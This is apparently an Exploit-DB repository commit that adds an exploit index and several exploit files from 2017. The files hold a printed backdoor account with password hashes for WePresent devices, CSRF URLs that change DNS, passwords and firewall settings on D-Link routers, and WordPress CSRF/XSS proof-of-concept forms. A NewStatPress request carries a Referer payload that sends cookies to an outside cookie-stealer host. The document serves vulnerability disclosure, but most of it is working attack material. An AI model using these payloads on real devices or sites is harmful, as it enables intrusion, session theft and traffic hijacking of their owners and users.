DB: 2017-03-02

14 new exploits SysGauge 1.5.18 - Buffer Overflow WePresent WiPG-1500 - Backdoor Account Windows x86 - Reverse TCP Staged Alphanumeric Shellcode (332 Bytes) DLink DSL-2730U Wireless N 150 - Cross-Site Request Forgery Aruba AirWave 8.2.3 - XML External Entity Injection / Cross-Site Scripting WordPress Plugin Contact Form Manager - Cross-Site Request Forgery / Cross-Site Scripting WordPress Plugin User Login Log 2.2.1 - Cross-Site Scripting WordPress Plugin Popup by Supsystic 1.7.6 - Cross-Site Request Forgery WordPress Plugin NewStatPress 1.2.4 - Cross-Site Scripting WordPress Plugin Global Content Blocks 2.1.5 - Cross-Site Request Forgery WordPress Plugin File Manager 3.0.1 - Cross-Site Request Forgery SchoolDir - SQL Injection Rage Faces Script 1.3 - SQL Injection Meme Maker Script 2.1 - 'user' Parameter SQL Injection
2017-03-02 05:01:19 +00:00 · 2017-03-02 05:01:19 +00:00 · 846ce42eca
commit 846ce42eca
parent 7fa7a111c4
15 changed files with 1275 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -15304,6 +15304,8 @@ id,file,description,date,author,platform,type,port
 41436,platforms/windows/remote/41436.py,"Disk Savvy Enterprise 9.4.18 - Buffer Overflow (SEH)",2017-02-22,"Peter Baris",windows,remote,0
 41443,platforms/macos/remote/41443.html,"macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution and Arbitrary File Read",2017-02-23,"Google Security Research",macos,remote,0
 41471,platforms/arm/remote/41471.rb,"MVPower DVR TV-7104HE 1.8.4 115215B9 - Shell Unauthenticated Command Execution (Metasploit)",2017-02-27,Metasploit,arm,remote,0
 41479,platforms/windows/remote/41479.py,"SysGauge 1.5.18 - Buffer Overflow",2017-02-28,"Peter Baris",windows,remote,0
 41480,platforms/hardware/remote/41480.txt,"WePresent WiPG-1500 - Backdoor Account",2017-02-27,"Quentin Olagne",hardware,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -15924,6 +15926,7 @@ id,file,description,date,author,platform,type,port
 41467,platforms/win_x86/shellcode/41467.c,"Windows x86 - Executable Directory Search Shellcode (130 bytes)",2017-02-26,"Krzysztof Przybylski",win_x86,shellcode,0
 41468,platforms/lin_x86-64/shellcode/41468.nasm,"Linux/x86_64 - Random Listener Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",lin_x86-64,shellcode,0
 41477,platforms/linux/shellcode/41477.c,"Linux/x86-64 - Reverse Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",linux,shellcode,0
 41481,platforms/win_x86/shellcode/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shellcode (332 Bytes)",2017-03-01,"Snir Levi",win_x86,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@ -37392,3 +37395,14 @@ id,file,description,date,author,platform,type,port
 41466,platforms/java/webapps/41466.py,"Grails PDF Plugin 0.6 - XML External Entity Injection",2017-02-21,"Charles Fol",java,webapps,0
 41470,platforms/php/webapps/41470.txt,"Joomla! Component OneVote! 1.0 - SQL Injection",2017-02-27,"Ihsan Sencan",php,webapps,0
 41472,platforms/hardware/webapps/41472.html,"NETGEAR DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery",2017-02-28,SivertPL,hardware,webapps,0
 41478,platforms/hardware/webapps/41478.txt,"DLink DSL-2730U Wireless N 150 - Cross-Site Request Forgery",2017-03-01,"B GOVIND",hardware,webapps,0
 41482,platforms/xml/webapps/41482.txt,"Aruba AirWave 8.2.3 - XML External Entity Injection / Cross-Site Scripting",2017-03-01,"SEC Consult",xml,webapps,0
 41483,platforms/php/webapps/41483.html,"WordPress Plugin Contact Form Manager - Cross-Site Request Forgery / Cross-Site Scripting",2017-03-01,"Edwin Molenaar",php,webapps,80
 41484,platforms/php/webapps/41484.txt,"WordPress Plugin User Login Log 2.2.1 - Cross-Site Scripting",2017-03-01,"Axel Koolhaas",php,webapps,80
 41485,platforms/php/webapps/41485.html,"WordPress Plugin Popup by Supsystic 1.7.6 - Cross-Site Request Forgery",2017-03-01,"Radjnies Bhansingh",php,webapps,80
 41486,platforms/php/webapps/41486.txt,"WordPress Plugin NewStatPress 1.2.4 - Cross-Site Scripting",2017-03-01,"Han Sahin",php,webapps,80
 41487,platforms/php/webapps/41487.html,"WordPress Plugin Global Content Blocks 2.1.5 - Cross-Site Request Forgery",2017-03-01,"Yorick Koster",php,webapps,80
 41488,platforms/php/webapps/41488.html,"WordPress Plugin File Manager 3.0.1 - Cross-Site Request Forgery",2017-03-01,"David Vaartjes",php,webapps,80
 41489,platforms/php/webapps/41489.txt,"SchoolDir - SQL Injection",2017-03-01,"Ihsan Sencan",php,webapps,0
 41490,platforms/php/webapps/41490.txt,"Rage Faces Script 1.3 - SQL Injection",2017-03-01,"Ihsan Sencan",php,webapps,0
 41491,platforms/php/webapps/41491.txt,"Meme Maker Script 2.1 - 'user' Parameter SQL Injection",2017-03-01,"Ihsan Sencan",php,webapps,0
--- a/platforms/hardware/remote/41480.txt
+++ b/platforms/hardware/remote/41480.txt
@ -0,0 +1,23 @@
 # Exploit Title: CVE-2017-6351 - WePresent undocumented privileged manufacturer backdoor account 
 # Date: 27/02/2017
 # Exploit Author: Quentin Olagne
 # Vendor Homepage: http://www.wepresentwifi.com/ or http://www.awindinc.com/products_wepresent_wipg_1500.html
 # Software Link: http://www.awindinc.com/products_wepresent_wipg_1500.html
 # Version: All versions of WiPG-1500 devices up to the latest firmware (1.0.3.7)
 # Tested on: Latest firmware (1.0.3.7) of WiPG-1500 device
 # CVE : CVE-2017-6351
 WiPG-1500 device embeds a firmware with a manufacturer account with hard coded username / password. 
 Once the device is set in DEBUG mode, an attacker can connect to the device using telnet protocol and log in the device with the 'abarco' hard-coded manufacturer account. 
 This account is not documented, neither the DEBUG feature nor the use of telnetd on a port TCP/5885 (when debug mode is ON).
 Here's the extract of the linux 'passwd' file:
 root:x:0:0:root:/home:/bin/sh
 abarco:x:1000:0:Awind-Barco User,,,:/home:/bin/sh
 and the 'shadow':
 root:$1$x1mFoD3w$uuvn.Z0p.XagX29uN3/Oa.:0:0:99999:7:::
 abarco:$1$JB0Pn5dA$sROUF.bZVoQSjVrV06fIx1:0:0:99999:7:::
 This vulnerability has been reported to the vendor but this product (WiPG-1500) is no longer maintained. This means it's a #WONTFIX vulnerability. Vendor has removed the 'abarco' account on the newest models but don't worry, DEBUG mode is still there with telnetd and you can also use the r00t account with a home and /bin/sh on the other systems in any case.
--- a/platforms/hardware/webapps/41478.txt
+++ b/platforms/hardware/webapps/41478.txt
@ -0,0 +1,120 @@
 Author		: 	B GOVIND
 Exploit Title	: 	DLink DSL-2730U Wireless N 150, Change DNS Configuration  bypassing ‘admin’ privilege
 Date		: 	01-03-2017
 Vendor Homepage	: http://www.dlink.co.in
 Firmware Link	: ftp://support.dlink.co.in/firmware/DSL-2730U
 Affected version	:  Hardware ver C1, Firmware ver: IN_1.0.0
 Email id	: govindnair7102@gmail.com 
 CVE		:  CVE-2017-6411
 Change DNS Configuration Bypassing ‘admin’ Privilege
 -------------------------------------------------------
 D-Link DSL-2730U wireless router is a very popular SOHO network device used in India. This device has three default accounts ‘admin’, ‘support’ and ‘user’. As per D-Link only “admin" account has unrestricted access to change configuration of device. Account name ‘user’ can just view configuration settings and statistics.
 1.	Description of Vulnerability
 Cross Site Request Forgery can be used to manipulate dnscfg.cgi in this device. An insider / external attacker (remote management to be enabled for external attacker) can change primary and secondary DNS IP address to some malicious IP address without using ‘admin’ account. 
 2.	Proof of Concept	
 Use following URL to modify the DNS entries:
 	http://user:user@192.168.1.1/dnscfg.cgi?dnsPrimary=x.x.x.x&dnsSecondary=y.y.y.y&dnsIfcsList=&dnsRefresh=1
 	Here x.x.x.x and y.y.y.y are the malicious IP address attacker can use.
 3.	Impact of vulnerability
 Information Disclosure:  An attacker exploiting this vulnerability can obtain confidential information like users browsing profile. Modifying device DNS settings allows cybercriminals to perform malicious activities like the following:
 (a)	 Redirect user traffic to malicious/fake sites. These sites can be phishing pages that spoofs well-known sites and tricks users into submit sensitive user credentials like banks account username and password.
 (b)	This can ensure that no more patches are updated from OS vendor sites or firewall sites.
 (c)	Replace ads on legitimate sites and serve users with unwanted/fake ads.
 (d)	Pushing malwares.
 4.	Solution
 As per D-Link India this is the only no updated firmware is available for this hardware version which can mitigate this vulnerability which avoids privilege escalation. 
 All users of this hardware should change default passwords of not just ‘admin’ account but also ‘user’ and ‘support’
 Change All Account Password Bypassing ‘admin’ Privilege
 ----------------------------------------------------------
    D-Link DSL-2730U wireless router is a very popular SOHO network device used in India. This device has three default accounts ‘admin’, ‘support’ and ‘user’. As per D-Link only “admin" account has unrestricted access to change configuration of device. Account name ‘user’ can just view configuration settings and statistics. Default password of admin, support and user account are admin, support and user respectively.
 1.  Description of Vulnerability
    Cross Site Request Forgery can be used to manipulate password.cgi in this device. An insider / external attacker (remote management to be enabled for external attacker) can change password of all the three accounts without using ‘admin’ account. 
 2.  Proof of Concept    
 This exploit works only when accounts are using default password.
 Use following URL to change  ‘admin’ account password from ‘admin’ to 
 ‘admin1’.
    http://user:user@192.168.1.1/password.cgi?
 inUserName=admin&inPassword=ZGFyZWFkbWluMQ==&inOrgPassword=ZGFyZWFkbWlu
 (b) Use following URL to change ‘support’ account password from ‘support’ to 
 ‘support1’.
 http://user:user@192.168.1.1/password.cgi?
 inUserName=support&inPassword=ZGFyZXN1cHBvcnQx&inOrgPassword=ZGFyZXN1cHBvcnQ=
 (c) Use following URL to change ‘user’ account password from ‘user’ to 
 ‘user1’.
 http://user:user@192.168.1.1/password.cgi?
 inUserName=user&inPassword=ZGFyZXVzZXIx&inOrgPassword=ZGFyZXVzZXI=
 Here ‘inPassword’ is the new password and ‘inOrgPassword’ is the existing password. Both these password strings are base64 encoded for confidentiality as connection between browser and web server is using http.
 3.  Impact of vulnerability
 Elevation of privilege, Information Disclosure, Denial Of service
 (a) Insider/Attacker can change the passwords of all the existing accounts and control the device as required. This will result in attacker having complete control over the device. He can capture traffic of other user and analyse traffic. Attacker can deny services as per his/her choice.
 4.  Solution
    As per D-Link India this is the only no updated firmware available for this hardware version which can mitigate this vulnerability. All users of this hardware should change default passwords of all the default accounts.
 Enable/Disable LAN side Firewall without admin privilege
 ---------------------------------------------------------
 	D-Link DSL-2730U wireless router is a very popular SOHO network device used in India. This device has three default accounts ‘admin’, ‘support’ and ‘user’. As per D-Link only “admin" account has unrestricted access to change configuration of device. Account name ‘user’ can just view configuration settings and statistics. Default password of admin, support and user account are admin, support and user respectively.
 1.	Description of Vulnerability
 	Cross Site Request Forgery can be used to manipulate lancfg2.cgi in this device. An insider / external attacker (remote management to be enabled for external attacker) can enable/disable LAN side firewall without ‘admin’ privilege using ‘user ‘ account. 
 2.	Proof of Concept	
   Use following URL to enable LAN side firewall
 	http://user:user@192.168.1.1/lancfg2.cgi?ethIpAddress=192.168.1.1&eth SubnetMask=255.255.255.0&enblLanFirewall=1&enblIgmpSnp=0&enblIgmpMode=0&dhcpEthStart=192.168.1.2&dhcpEthEnd=192.168.1.254&dhcpLeasedTime=86400&enblDhcpSrv=1&enblLan2=0&enblLanDns=0
 Use following URL to disable LAN side firewall
 http://user:user@192.168.1.1/lancfg2.cgi?ethIpAddress=192.168.1.1&ethSubnetMask=255.255.255.0&enblLanFirewall=0&enblIgmpSnp=0&enblIgmpMode=0&dhcpEthStart=192.168.1.2&dhcpEthEnd=192.168.1.254&dhcpLeasedTime=86400&enblDhcpSrv=1&enblLan2=0&enblLanDns=0
 3.	Impact of vulnerability
 By disabling LAN side firewall and by enabling Port Triggering, an attacker can ensure a backdoor access within LAN side as well as from WAN side.
 Attacker can run port scanning tools to map services which otherwise wont be possible with firewall enabled.
 4.	Solution
 	As per D-Link India this is the only no updated firmware available for this hardware version which can mitigate this vulnerability. All users of this hardware should change default passwords of all the default accounts.
--- a/platforms/php/webapps/41483.html
+++ b/platforms/php/webapps/41483.html
@ -0,0 +1,53 @@
 <!--
 Source: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery___cross_site_scripting_in_contact_form_manager_wordpress_plugin.html
 Abstract
 It was discovered that Contact Form Manager does not protect against Cross-Site Request Forgery. This allows an attacker to change arbitrary Contact Form Manager settings. In addtion, the plugin also fails to apply proper output encoding, rendering it vulnerable to stored Cross-Site Scripting.
 Contact
 For feedback or questions about this advisory mail us at sumofpwn at securify.nl
 The Summer of Pwnage
 This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
 OVE ID
 OVE-20160718-0003
 Tested versions
 These issues were successfully tested on Contact Form Manager WordPress Plugin version
 Fix
 There is currently no fix available.
 Introduction
 The Contact Form Manager WordPress Plugin lets users create and manage multiple customized contact forms for their website. It supports a wide range of contact form elements such as text field, email field, textarea, dropdown list, radio button, checkbox, date picker, captcha, and file uploader. It was discovered that Contact Form Manager does not protect against Cross-Site Request Forgery. This allows an attacker to change arbitrary Contact Form Manager settings. In addtion, the plugin also fails to apply proper output encoding, rendering it vulnerable to stored Cross-Site Scripting.
 Details
 These issues exists, because the plugin lacks an anti-CSRF token. Also improper filtering/output encoding is done on $_POST parameters. These issues are present in the filed contact-form-manager/admin/add_smtp.php and contact-form-manager/admin/form-edit.php.
 The username input field on the XYZ Contact > SMTP Settings is vulnerable for Cross-Site Scripting, as wel as the Contact Form Name input field on the XYZ Contact > Contact Form page.
 SMTP Settings URL:
 http://<target>/wp-admin/admin.php?page=contact-form-manager-manage-smtp
 Contact Forms URL:
 http://<target>/wp-admin/admin.php?page=contact-form-manager-managecontactformsp
 Proof of concept:
 -->
 <html>
   <body>
      <form id="f1" method="POST" action="http://<target>/wp-admin/admin.php?page=contact-form-manager-manage-smtp&action=add-smtp">
         <table>
            <tr><td>xyz_cfm_SmtpAuthentication<td><input name="xyz_cfm_SmtpAuthentication" value="true" size="100"></tr>
            <tr><td>xyz_cfm_SmtpEmailAddress<td><input name="xyz_cfm_SmtpEmailAddress" value="<svg onload=alert(document.domain)>" size="100"></tr>
            <tr><td>xyz_cfm_SmtpHostName<td><input name="xyz_cfm_SmtpHostName" value="<svg onload=alert(document.domain)>" size="100"></tr>
            <tr><td>xyz_cfm_SmtpPassword<td><input name="xyz_cfm_SmtpPassword" value="<svg onload=alert(document.domain)>" size="100"></tr>
            <tr><td>xyz_cfm_SmtpPortNumber<td><input name="xyz_cfm_SmtpPortNumber" value="25" size="100"></tr>
            <tr><td>xyz_cfm_SmtpSecuirity<td><input name="xyz_cfm_SmtpSecuirity" value="notls" size="100"></tr>
         </table>
      </form>
      <button onclick="document.getElementById('f1').submit()">Submit</button>
   </body>
 </html>
--- a/platforms/php/webapps/41484.txt
+++ b/platforms/php/webapps/41484.txt
--- a/platforms/php/webapps/41485.html
+++ b/platforms/php/webapps/41485.html
@ -0,0 +1,151 @@
 <!--
 Source: https://sumofpwn.nl/advisory/2016/popup_by_supsystic_wordpress_plugin_vulnerable_to_cross_site_request_forgery.html
 Abstract
 A Cross-site Request Forgery vulnerablity exists in the Popup by Supsystic WordPress Plugin. This vulnerablity allows attackers to add and modify scripting code that will target authenticated WordPress admins or visitors that see the popup generated by this plugin. Before exploitation of this issue succeeds, and scripting code is therefore injected, a victim WordPress admin to click a specially crafted link or visit a malicious attacker-controlled webpage.
 Contact
 For feedback or questions about this advisory mail us at sumofpwn at securify.nl
 The Summer of Pwnage
 This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
 OVE ID
 OVE-20160724-0013
 Tested versions
 This issue was succesfully tested on the Popup by Supsystic WordPress plugin version 1.7.6.
 Fix
 There is currently no fix available.
 Introduction
 The aim of the Popup by Supsystic WordPress plugin is to help you get more newsletter subscribers, promote new products, deliver special offers and to get more social followers.
 A Cross-site Request Forgery vulnerablity exists in the Popup by Supsystic WordPress Plugin. This vulnerablity allows attackers to add and modify scripting code that will target authenticated admins or visitors that see the popup generated by this plugin. In order to exploit this issue the target user must click a specially crafted link or visit a malicious website (or advertisement).
 Details
 This issue exists because Popup by Supsystic lacks protection against Cross-Site Request Forgery attacks. The following proof of concept code demonstrates this issue:
 -->
 <html>
   <body>
      <form action="http://<target>/wp-admin/admin-ajax.php" method="POST">
         <input type="hidden" name="params[main][show_on]" value="page_load" />
         <input type="hidden" name="params[main][show_on_page_load_delay]" value="" />
         <input type="hidden" name="ppsCopyTextCode" value="[supsystic-show-popup id=100]" />
         <input type="hidden" name="ppsCopyTextCode" value="onclick="ppsShowPopup(100); return false;"" />
         <input type="hidden" name="ppsCopyTextCode" value="#ppsShowPopUp_100" />
         <input type="hidden" name="params[main][show_on_click_on_el_delay]" value="0" />
         <input type="hidden" name="params[main][show_on_scroll_window_delay]" value="0" />
         <input type="hidden" name="params[main][show_on_scroll_window_perc_scroll]" value="0" />
         <input type="hidden" name="ppsCopyTextCode" value="#ppsShowPopUp_100" />
         <input type="hidden" name="params[main][show_on_link_follow_delay]" value="0" />
         <input type="hidden" name="ppsCopyTextCode" value="[supsystic-popup-content id=100]" />
         <input type="hidden" name="params[main][close_on]" value="user_close" />
         <input type="hidden" name="params[main][show_pages]" value="all" />
         <input type="hidden" name="params[main][show_time_from]" value="12:00am" />
         <input type="hidden" name="params[main][show_time_to]" value="12:00am" />
         <input type="hidden" name="params[main][show_date_from]" value="" />
         <input type="hidden" name="params[main][show_date_to]" value="" />
         <input type="hidden" name="params[main][show_to]" value="everyone" />
         <input type="hidden" name="params[main][show_to_first_time_visit_days]" value="30" />
         <input type="hidden" name="params[main][show_to_until_make_action_days]" value="30" />
         <input type="hidden" name="params[main][count_times_num]" value="1" />
         <input type="hidden" name="params[main][count_times_mes]" value="day" />
         <input type="hidden" name="params[main][hide_for_devices_show]" value="0" />
         <input type="hidden" name="params[main][hide_for_post_types_show]" value="0" />
         <input type="hidden" name="params[main][hide_for_ips_show]" value="0" />
         <input type="hidden" name="params[main][hide_for_ips]" value="" />
         <input type="hidden" name="params[main][hide_for_countries_show]" value="0" />
         <input type="hidden" name="params[main][hide_for_languages_show]" value="0" />
         <input type="hidden" name="params[main][hide_search_engines_show]" value="0" />
         <input type="hidden" name="params[main][hide_preg_url_show]" value="0" />
         <input type="hidden" name="params[main][hide_preg_url]" value="" />
         <input type="hidden" name="params[main][hide_for_user_roles_show]" value="0" />
         <input type="hidden" name="params[tpl][width]" value="400" />
         <input type="hidden" name="params[tpl][width_measure]" value="px" />
         <input type="hidden" name="params[tpl][bg_overlay_opacity]" value="0.5" />
         <input type="hidden" name="params[tpl][bg_type_0]" value="color" />
         <input type="hidden" name="params[tpl][bg_img_0]" value="" />
         <input type="hidden" name="params[tpl][bg_color_0]" value="#8c7764" />
         <input type="hidden" name="params[tpl][bg_type_1]" value="color" />
         <input type="hidden" name="params[tpl][bg_img_1]" value="" />
         <input type="hidden" name="params[tpl][bg_color_1]" value="#75362c" />
         <input type="hidden" name="params[tpl][font_label]" value="default" />
         <input type="hidden" name="params[tpl][label_font_color]" value="#ffffff" />
         <input type="hidden" name="params[tpl][font_txt_0]" value="default" />
         <input type="hidden" name="params[tpl][text_font_color_0]" value="#f9e6ce" />
         <input type="hidden" name="params[tpl][font_footer]" value="default" />
         <input type="hidden" name="params[tpl][footer_font_color]" value="#585858" />
         <input type="hidden" name="params[tpl][responsive_mode]" value="def" />
         <input type="hidden" name="params[tpl][reidrect_on_close]" value="" />
         <input type="hidden" name="params[tpl][close_btn]" value="while_close" />
         <input type="hidden" name="params[tpl][bullets]" value="lists_green" />
         <input type="hidden" name="layered_style_promo" value="1" />
         <input type="hidden" name="params[tpl][layered_pos]" value="" />
         <input type="hidden" name="params[tpl][enb_label]" value="1" />
         <input type="hidden" name="params[tpl][label]" value="SIGN UP<br> to our Newsletter!" />
         <input type="hidden" name="params[tpl][enb_txt_0]" value="1" />
         <input type="hidden" name="params_tpl_txt_0" value="<p>Popup by Supsystic lets you easily create elegant overlapping windows with unlimited features. Pop-ups with Slider, Lightbox, Contact and Subscription forms and more</p>" />
         <input type="hidden" name="params[tpl][foot_note]" value="We respect your privacy. Your information will not be shared with any third party and you can unsubscribe at any time " />
         <input type="hidden" name="params[tpl][enb_sm_facebook]" value="1" />
         <input type="hidden" name="params[tpl][enb_sm_googleplus]" value="1" />
         <input type="hidden" name="params[tpl][enb_sm_twitter]" value="1" />
         <input type="hidden" name="params[tpl][sm_design]" value="boxy" />
         <input type="hidden" name="params[tpl][anim_key]" value="none" />
         <input type="hidden" name="params[tpl][anim_duration]" value="" />
         <input type="hidden" name="params[tpl][enb_subscribe]" value="1" />
         <input type="hidden" name="params[tpl][sub_dest]" value="wordpress" />
         <input type="hidden" name="params[tpl][sub_wp_create_user_role]" value="subscriber" />
         <input type="hidden" name="params[tpl][sub_aweber_listname]" value="" />
         <input type="hidden" name="params[tpl][sub_aweber_adtracking]" value="" />
         <input type="hidden" name="params[tpl][sub_mailchimp_api_key]" value="" />
         <input type="hidden" name="params[tpl][sub_mailchimp_groups_full]" value="" />
         <input type="hidden" name="test_email" value="canzihazcandy@gmail.com" />
         <input type="hidden" name="params[tpl][sub_fields][name][enb]" value="1" />
         <input type="hidden" name="params[tpl][sub_fields][name][name]" value="name" />
         <input type="hidden" name="params[tpl][sub_fields][name][html]" value="text" />
         <input type="hidden" name="params[tpl][sub_fields][name][label]" value="Name" />
         <input type="hidden" name="params[tpl][sub_fields][name][value]" value="" />
         <input type="hidden" name="params[tpl][sub_fields][name][custom]" value="0" />
         <input type="hidden" name="params[tpl][sub_fields][name][mandatory]" value="0" />
         <input type="hidden" name="params[tpl][sub_fields][email][name]" value="email" />
         <input type="hidden" name="params[tpl][sub_fields][email][html]" value="text" />
         <input type="hidden" name="params[tpl][sub_fields][email][label]" value="E-Mail" />
         <input type="hidden" name="params[tpl][sub_fields][email][value]" value="" />
         <input type="hidden" name="params[tpl][sub_fields][email][custom]" value="0" />
         <input type="hidden" name="params[tpl][sub_fields][email][mandatory]" value="1" />
         <input type="hidden" name="params[tpl][sub_fields][email][enb]" value="1" />
         <input type="hidden" name="params[tpl][sub_txt_confirm_sent]" value="Confirmation link was sent to your email address. Check your email!" />
         <input type="hidden" name="params[tpl][sub_txt_success]" value="Thank you for subscribe!" />
         <input type="hidden" name="params[tpl][sub_txt_invalid_email]" value="Empty or invalid email" />
         <input type="hidden" name="params[tpl][sub_txt_exists_email]" value="Empty or invalid email" />
         <input type="hidden" name="params[tpl][sub_redirect_url]" value="" />
         <input type="hidden" name="params[tpl][sub_txt_confirm_mail_subject]" value="Confirm subscription on [sitename]" />
         <input type="hidden" name="params[tpl][sub_txt_confirm_mail_from]" value="admin@mail.com" />
         <input type="hidden" name="params[tpl][sub_txt_confirm_mail_message]" value="You subscribed on site <a href="[siteurl]">[sitename]</a>. Follow <a href="[confirm_link]">this link</a> to complete your subscription. If you did not subscribe here - just ignore this message." />
         <input type="hidden" name="params[tpl][sub_txt_subscriber_mail_subject]" value="[sitename] Your username and password" />
         <input type="hidden" name="params[tpl][sub_txt_subscriber_mail_from]" value="admin@mail.com" />
         <input type="hidden" name="params[tpl][sub_txt_subscriber_mail_message]" value="Username: [user_login]<br />Password: [password]<br />[login_url]" />
         <input type="hidden" name="params[tpl][sub_redirect_email_exists]" value="" />
         <input type="hidden" name="params[tpl][sub_btn_label]" value="SIGN UP" />
         <input type="hidden" name="params[tpl][sub_new_email]" value="admin&@mail.com" />
         <input type="hidden" name="params[tpl][sub_new_subject]" value="New Subscriber on Summer of Pwnage" />
         <input type="hidden" name="params[tpl][sub_new_message]" value="You have new subscriber on your site <a href="[siteurl]">[sitename]</a>, here us subscriber information:<br />[subscriber_data]" />
         <input type="hidden" name="stat_from_txt" value="" />
         <input type="hidden" name="stat_to_txt" value="" />
         <input type="hidden" name="css" value="" />
         <input type="hidden" name="html" value="<link rel="stylesheet" type="text/css" href="//fonts.googleapis.com/css?family=Amatic+SC" />&#10; <script>alert("xss")</script>&#10;<div id="ppsPopupShell_[ID]" class="ppsPopupShell ppsPopupListsShell">&#10;   <a href="#" class="ppsPopupClose ppsPopupClose_[close_btn]"></a>&#10;&#10;   <div class="ppsInnerTblContent">&#10;      <div class="ppsPopupListsInner ppsPopupInner">&#10;         [if enb_label]&#10;            <div class="ppsPopupLabel ppsPopupListsLabel">[label]</div>&#10;         [endif]&#10;         <div style="clear: both;"></div>&#10;         [if enb_txt_0]&#10;            <div class="ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_0 ppsPopupTxt_0">&#10;            [txt_0]&#10;            </div>&#10;         [endif]&#10;         [if enb_subscribe]&#10;            <div class="ppsSubscribeShell">&#10;               [sub_form_start]&#10;               [sub_fields_html]&#10;               <input type="submit" name="submit" value="[sub_btn_label]" />&#10;               [sub_form_end]&#10;               <div style="clear: both;"></div>&#10;            </div>&#10;         [endif]&#10;         <div style="clear: both;"></div>&#10;         <div class="ppsRightCol">&#10;            [if enb_sm]&#10;               <div style="clear: both;"></div>&#10;               <div class="ppsSm">&#10;               [sm_html]&#10;               </div>&#10;            [endif]&#10;            [if enb_foot_note]&#10;               <div class="ppsFootNote">&#10;               [foot_note]&#10;               </div>&#10;            [endif]&#10;         </div>&#10;      </div>&#10;   </div>&#10;</div>&#10;" />
         <input type="hidden" name="params[opts_attrs][bg_number]" value="2" />
         <input type="hidden" name="params[opts_attrs][txt_block_number]" value="1" />
         <input type="hidden" name="mod" value="popup" />
         <input type="hidden" name="action" value="save" />
         <input type="hidden" name="id" value="100" />
         <input type="hidden" name="params_tpl_txt_val_0" value="<p>Popup by Supsystic lets you easily create elegant overlapping windows with unlimited features. Pop-ups with Slider, Lightbox, Contact and Subscription forms and more</p>" />
         <input type="hidden" name="pl" value="pps" />
         <input type="hidden" name="reqType" value="ajax" />
         <input type="submit"/>
      </form>
   </body>
 </html>
--- a/platforms/php/webapps/41486.txt
+++ b/platforms/php/webapps/41486.txt
@ -0,0 +1,48 @@
 Source: https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_the_wordpress_newstatpress_plugin.html
 Abstract
 A persistent Cross-Site Scripting (XSS) vulnerability has been found in the WordPress NewStatPress plugin. By using this vulnerability an attacker can inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.
 Contact
 For feedback or questions about this advisory mail us at sumofpwn at securify.nl
 The Summer of Pwnage
 This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
 OVE ID
 OVE-20160712-0030
 Tested versions
 This issue was successfully tested on WordPress NewStatPress plugin version 1.2.4.
 Fix
 This issue has been addressed in NewStatPress version 1.2.5. This version can be download from the NewStatPress GitHub account: https://github.com/lechab/newstatpress#125
 Introduction
 The WordPress NewStatPress plugin is a real-time plugin to manage the visits' statistics on a WordPress site. It doesn't require external web analytics. A persistent Cross-Site Scripting vulnerability has been discovered in the WordPress NewStatPress plugin which allows an unauthenticated attacker to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content. The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes or deliver malware.
 Details
 The WordPress NewStatPress plugin fails to sufficiently check input supplied to a GET request for a resource on a WordPress site with a vulnerable version of the NewStatPress plugin. In addition input supplied to the Referer header is insufficiently sanitized. As a result a malicious request will be stored on the Last Visitors and Visitors tab of the Visits page, executing the payload when an unsuspecting user views one of the mentioned tabs on this page.
 Persistent Cross-Site Scripting vulnerabilities are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, in this case potentially a WP admin reviewing the stats.
 Proof of concept
 This vulnerability can be demonstrated by submitting the following request:
 GET /sumofpwn/"><script>alert(document.cookie);</script> HTTP/1.1
 Host: 192.168.28.129
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla Chrome/51.0.2704.103 Safari/537.36
 Referer: javascript:document.location=`http://www.XXXXXXyourhackerdomainXXXXXX.nl/demo/xss/cookiestealer.php?c=`+encodeURIComponent(document.cookie);
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Accept-Encoding: gzip, deflate, sdch
 Accept-Language: en-US,en;q=0.8,nl;q=0.6
 Connection: close
 Based on the above request, the vulnerable output will be:
 1) <a href="/?/sumofpwn/\"><script>alert(document.cookie);</script>" target="_blank">/sumofpwn/\"><script>alert(document.cookie);</script></a>
 2) Arrived from <a href="javascript:document.location=`http://www.sfylabs.nl/demo/xss/cookiestealer.php?c=`+encodeURIComponent(document.cookie);" target="_blank">javascript:document.location=`http://www.sfylabs.nl/demo/xss/cookiestealer.php?c=`+encodeURIComponent(document.cookie);</a>
